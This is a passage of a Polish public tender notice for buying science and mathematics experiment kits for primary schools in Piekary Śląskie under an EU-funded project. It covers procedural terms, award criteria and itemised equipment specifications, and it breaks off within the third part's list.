3)  Zgodnie z art. 30 ust. 5 ustawy Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego dostawy, usługi, roboty budowlane spełniają wymagania określone przez Zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych ma w szczególności gwarantować realizację robót w zgodzie z dokumentacją techniczną oraz zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.

4.  Na podstawie art. 29 ust. 3a ustawy PZP Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących następujące czynności w zakresie  realizacji zamówienia (tylko dla części 5 i 6):
          a) projekt oznaczenia materiałów zgodnie z opisem w Rozdziale 2, pkt. 1 część 4,
b)	sposób dokumentowania zatrudnienia osób, o których mowa w pkt 4.a) oraz uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań oraz sankcji, określone zostały w § 2 pkt 4-7 projektów umowy.

<br /><br /><b>II.5) Główny kod CPV: </b>39162000-5<br /><b> Dodatkowe kody CPV:</b>39162100-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	 odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art.24 ust.5 pkt 1 ustawy.

2)	 dokumenty dotyczące podmiotu trzeciego, w celu wykazania braku istnienia wobec niego  podstaw wykluczenia oraz spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu- jeżeli wykonawca polega na zasobach podmiotu trzeciego. 

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)	Formularz ofertowy sporządzony i wypełniony według wzoru stanowiącego Załącznik nr 1               ( odrębnie dla każdej części ) wraz z załączonym wykazem oferowanego sprzętu.
2)	Oświadczenia, o których mowa w rozdziale 7.1 SIWZ według wzoru stanowiącego załącznik nr 2 do SIWZ.
3)	Pełnomocnictwo do reprezentowania wykonawcy ( wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik,
4)	Zobowiązanie podmiotu trzeciego, o którym mowa w rozdziale 6.5.1) i 6.5.4) SIWZ  jeżeli wykonawca polega na zasobach lub sytuacji podmiotu trzeciego,


</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termi dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 23/03/2017, godzina: 11:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zakup i dostawa 7 zestawów do eksperymentu  nauki przyrodnicze (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych/matematyki) dla szkół: MSP nr 1, 9, 11, 12, 14, 15 oraz  Zespołu Szkół im. Marii Grzegorzewskiej w Piekarach Śląskich, w ramach projektu Piekarska Akademia Rozwoju dofinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego  Województwa Śląskiego na lata 2014-2020 (Europejskiego Funduszu Społecznego).<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 1 

               
Zestaw do eksperymentu  nauki przyrodnicze (7szt)

Lp.	Nazwa sprzętu	Ilość sztuk	Specyfikacja techniczna
1.	Symulator biegu w przyrodzie	1 szt.	- model wykonany z tworzywa sztucznego, trójwymiarowy,
- funkcjonalny symulator.
- model zawiera: wypukłą wanienkę, pokrywka, pokrywka na chmurę, stojak.
2.	Zestaw doświadczalny gleba	1 szt.	- wyposażony laboratoryjnie (cylindry, szalki, zlewki, pipety, itd.),
- w zestawie karty pracy, 20 doświadczeń wraz z omówieniem dla prowadzącego zajęcia,
- zestaw zawiera kolorowe, foliowane plansze A4,
- zestaw umieszczony w sztywnej walizce.
3.	Medialna baza wiedzy przyroda
	1szt	- wersja dla Szkoły Podstawowej  klasy 4,5,6,
- nośnik CD,
- wersja BOX,
- platforma CD,
- wersja polska.
4.	Globus fizyczny
	1szt	- duży globus fizyczny,
- średnica min. 42 cm.
5.	Kompas
	1szt	- stal wysokogatunkowa,
- średnica tarczy min. 4-5 cm,
- typ: busola soczewkowa do wyznaczania azymutu w terenie.
6.	Mapa fizyczna świata
	1szt	- mapa ścienna,
- dwustronna  fizyczna,
- min. 200 x 140 cm,
- 1:19 000 000.
7.	Szkiełka mikroskopowe
	1szt	- wymiary min. 24x50 mm,
- w zestawie min. 100 szt.
8.	Soczewki
	1szt	- zestaw min. 6 różnych soczewek śr. 50 mm + stojak,
- soczewki umieszczone w drewnianym, zamykanym pudełku z miękkimi przegródkami na każdą soczewkę.

9.	Zwierciadło wklęsłe
	1szt	- przyrząd do obserwacji obrazu rzeczywistego w zwierciadle wklęsłym,
- średnica min. 22 cm.

10.	Pryzmat
	1szt	- szklany,
- równoboczny, min. 38 mm.
11.	Odczynniki
	1 komplet	Zestaw odczynników składający się z:
- tiosiarczan sodu czysty min. 1kg,
- wodorotlenek wapnia czysty min. 250g,
- chlorek żelaza min. 500g.
12.	Mobilny stojak na mapy
	1szt	- bardzo lekka, aluminiowa, solidna konstrukcja,
- wyposażony w kółka.
13.	Pierścień Grawensanda
	1szt	Zestaw zawiera:
- metalowy pierścień z rączką,
- kulka (z tego samego metalu) z rączką o średnicy mniejszej od wewnętrznej średnicy pierścienia.
14.	Stoper
	1szt	- elektroniczny,
- wyświetlacza jednoliniowy,
- wodoodporny,
- alarm,
- zegar,
- kalendarz,
- dokładność nie gorsza niż.: 1/100s.
15	Termometr cieczowy
	1szt	- termometr ze skalą min. -30 do 110 st. C,
- obudowa, z min.6 kolorowymi suwakami,
- termometr można wyjąć z obudowy.
16	Kolby stożkowe
	1szt	- pojemność min. 200 ml,
- wąska szyjka (biokrzemian.).
17	Fartuchy
	5szt	- fartuch laboratoryjny,
- z wysokiej jakości materiału, z trwałej tkaniny poliestrowo -  bawełnianej z wykończeniem wodo i plamoodpornym,
- wyposażony w ściągacze na końcach rękawów.
18	Klucze do oznaczania roślin
	1 zestaw	Zestaw kluczy składa się z następujących pozycji:
- atlas i klucz. Rośliny zielne i krzewiki Polskiem
- przewodnik do oznaczania zbiorowisk roślinnych Polski  karta pozycji,
- klucz do oznaczania roślin naczyniowych Polski niżowej.
lub równoważne
19	Programy interaktywne
	1szt	- wersja dla Szkoły Podstawowej  klasy 4,5,6,
- pakiet zawiera min. 5 płyt CD-ROM,
- dla klas podstawowych 4-6,program do nauki przyrody
20	Laboratorium do hodowli kwiatów
	1szt	- zestaw zawiera min. 3 przeźroczyste rurki, wykonane z trwałego tworzywa,
- zestaw służyć będzie do obserwacji roślin, w tym korzeni,
- min. 3 podstawy do pojemników.
21	Kamera
	1szt	- ekran o rozmiarze min. 2,
- maksymalna jakość zdjęć min. 12 mega pikseli,
- nagranie wideo  w trybie min.20 klatek na sekundę,
- pamięć wewnętrzna min. 64 MB, z możnością rozszerzenia do min. 2 GB,
- ładowana bateria
lub równoważne.

22	Mikroskop
	1szt	- wys. min. 30 cm  szuflada na preparaty,
- powiększenie do min. 400,
- wbudowana lampka LED,
- zdejmowana głowica,
- wymaga 3 baterii AAA
lub równoważne
23	Termometr cieczowy	1szt	- termometr ze skalą min.-30 do 110 st. C,
- obudowa, z min.6 kolorowymi suwakami,
- termometr można wyjąć z obudowy.
24	Model ucha	1szt	- duży,
- sześcioczęściowy,
- wykonany z tworzywa sztucznego,
- na podstawce,
- wymiary min.: wysokość  24 cm, długość  36 cm, szerokość  19 cm.

25	Peryskop

	1szt	- przyrząd optyczny,
- regulowana długość: min. od 20,5 do 39,5 cm.
- wykonany z trwałego tworzywa.
26	Małe obserwatorium glebowe	1szt	Zestaw składa się z:
- pojemnik z tworzywa,
- wentylowana pokrywka,
- stopki,
- 4 opakowania kolorowego granulatu,
- instrukcja.
27	Kompozycja zwierzęca	1 zestaw	Zestaw gospodarski zwierząt, składający się z:
- duże figury zwierząt,
- min. 7 sztuk,
- wykonane z trwałego tworzywa.

28	Siłomierz
	1szt	- dynamometr (siłomierz),
- wykonany w trwałej metalowej obudowie  10N.
29	Preparaty mikroskopijne protistów	1szt	- grzyby i glony pod mikroskopem,
- min. 10 preparatów mikroskopijnych w pudełku,
- zapakowane w solidne pudełko.
30	Mapa topograficzna miasta	1szt	- plan miasta Bytom, Piekary Śląskie, Radzionków,
- skala: 1:20 000.
31	Stacja metrologiczna	1szt	- przeznaczona do kontroli i obserwacji podstawowych parametrów klimatycznych, temperatury powietrza,
- do mierzenia: powietrza, prędkości wiatru, kierunek wiatru,
- długość min. 116 cm.

32	Model serca
	1szt	- model/rozmiar rzeczywisty,
- zamontowany na stojaku, z którego można go ściągnąć.
- wykonany z tworzywa sztucznego.

33	Miernik elektroniczny	1szt	- uniwersalny,
- posiada następujące funkcje pomiaru: napięcia prądu przemiennego, napięcia prądu stałego, wartość prądu stałego, rezystancji, pomiar diody, tester baterii 1,5V, 9V.
34	Zestaw do ćwiczeń optycznych	1 zestaw	- ława optyczna z wyposażeniem min. podstawowym,
- długość min. 1 m (100cm),
- w skład ławy wchodzą min. następujące elementy: lampa optyczna, uchwyt soczewki, soczewka obustronnie wypukła x 3szt, soczewka płasko  wypukła, uchwyt ekranu, ekran biały, ekran szklany matowy, przesłona I.
35	Waga laboratoryjna	1szt	- zakres ważenia min. 10 000g z dokładnością nie gorsza niż 0,1g,
- powierzchnia ważenia oraz szalka wykonane są ze stali szlachetnej,
- powierzchnia platformy  min. 18x18 cm,
- waga posiadająca funkcję zliczania,
- zasilanie zarówno z baterii oraz sieci.
36	Akwarium do hodowli roślin	1szt	- szklane,
- pojemność min. 112 l.,
- wymiary min.: 80x35x40 cm.


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162000-5, 39162100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie nr 2: Zakup i dostawa 13 zestawów do eksperymentu  nauki przyrodnicze (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych) dla szkół: MSP nr 1, 9, 11, 12, 14, 15 oraz  Zespołu Szkół im. Marii Grzegorzewskiej w Piekarach Śląskich, w ramach projektu Piekarska Akademia Rozwoju dofinansowanego ze środków Unii Europejskiej w ramach w ramach Regionalnego Programu Operacyjnego  Województwa Śląskiego na lata 2014-2020  (Europejskiego Funduszu Społecznego).<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 2 

Zestaw do prowadzenia zajęć w ramach koła przyrodniczego (13szt)
Lp.	Nazwa sprzętu	Ilość sztuk	Specyfikacja techniczna
1.	Fartuch	6 szt.	- fartuch laboratoryjny,
- z wysokiej jakości materiału, z trwałej tkaniny poliestrowo -  bawełnianej z wykończeniem wodo i plamoodpornym,
- wyposażony w ściągacze na końcach rękawów.
2.	Zestaw balonów lateksowych - kolorowe 100 sztuk	10 kompletów	- lateksowe,
- różnokolorowe,
- średnica min. 35cm,
- w komplecie min. 100 szt.
3.	Szkiełka mikroskopowe	5 kompletów	- wymiary min. 24x50 mm,
- w zestawie min. 100 szt.
4.	Nagietek lekarski nasiona	10 szt	- waga min. 0,3g.

5.	Aster Alpejski nasiona	10 szt	- waga min. 0,4g.

6.	Aster Chiński nasiona	10 szt	- waga min. 0,4g.

7.	Sól
	1szt	- waga min. 1 kg.
8.	Druk nawojowy miedziany 
	1 szt.	- drut miedziany miedziany,
- długość min. 22m.
- średnica min. 2,50 mm,
- waga min. 1kg.

9.	Srebrzanka drut miedziany srebrzony	10 szt	- grubość min. 0,8 mm.
- 1 metr

10.	Chlorek żelaza	2szt	- waga min. 500 g.

11.	Tiosiarczan sodu	2szt	- czysty,
- waga min. 1kg.

12.	Ziarna grochu
	1szt	- waga min. 400g.
13.	Ziarna fasoli - Piękny Jaś
	1szt	- waga min. 400g.
14.	Torf ogrodniczy (kwaśny)
	1szt	- waga min. 20l.

15	Podłoże do siewu i pikowania
	1szt	- waga min. 20l.
16	Podłoże uniwersalne	1 szt.	- waga min. 50l
17	Wodorotlenek wapnia
	2szt	- czysty,
- waga min. 250g.
18	Chlorek magnezu
	2szt	- sześciowodny,
- waga min. 1kg.
19	Chlorek potasu
	2szt	- min. 99% potasowy,
- waga min. 1kg.

20	Rękawiczki lateksowe	1 komplet	- bezpudrowe,
- lateksowe,
- w komplecie min. 100 szt.
 <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162000-5, 39162100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie nr 3: Zakup i dostawa 7 zestawów do eksperymentu  nauki matematyczne (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych/matematyki) dla szkół: MSP nr 1, 9, 11, 12, 14, 15 oraz  Zespołu Szkół im. Marii Grzegorzewskiej w Piekarach Śląskich, w ramach projektu Piekarska Akademia Rozwoju dofinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego  Województwa Śląskiego na lata 2014-2020  (Europejskiego Funduszu Społecznego).<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 3 

Zestaw do eksperymentu  nauki matematyczne (7szt)

Lp.	Nazwa sprzętu	Ilość sztuk	Specyfikacja techniczna
1.	Duży czytelny zegar tarczowy	1 szt.	- magnetyczny zegar demonstracyjny  śr. min. 41 cm,
- wykonany z tworzywa sztucznego,
- cztery mocne wbudowane magnesy.
2.	Geoplan	1 szt.	- dwustronny,
- wykonany z trwałego, mocnego tworzywa,
- w komplecie gumeczki do ćwiczeń.
3.	Liczydło	1 szt.	- wyposażone w min. 10 rzędów z kolorowymi kulkami,
- wykonane z solidnego materiału.
4.	Klocki sześcienne
	1 zestaw	- zestaw zawiera min. 8 otwieranych brył geometrycznych wykonanych z przeźroczystego plastiku,
- zestaw zawiera: walec, stożek, sześcian, prostopadłościan, graniastosłup trójkątny, graniastosłup sześciokątny, czworościan, ostrosłup o podstawie kwadratu.
5.	Bryły magnetyczne	1 zestaw	- zestaw składa się z min. 8 brył magnetycznych: 4 kule o średnicy min. 7,6 cm i 4 sześciany o boku 7,6 cm,
- pudełko i podstawa do przechowywania,
- bryły wykonane z wytrzymałego tworzywa.
6.	Klocki geometryczne	1 zestaw	- zestaw składa się z: siedmiu różnych figur geometrycznych o długości boków min. 7  10 cm,
- wykonane z bezpiecznego i trwałego tworzywa.
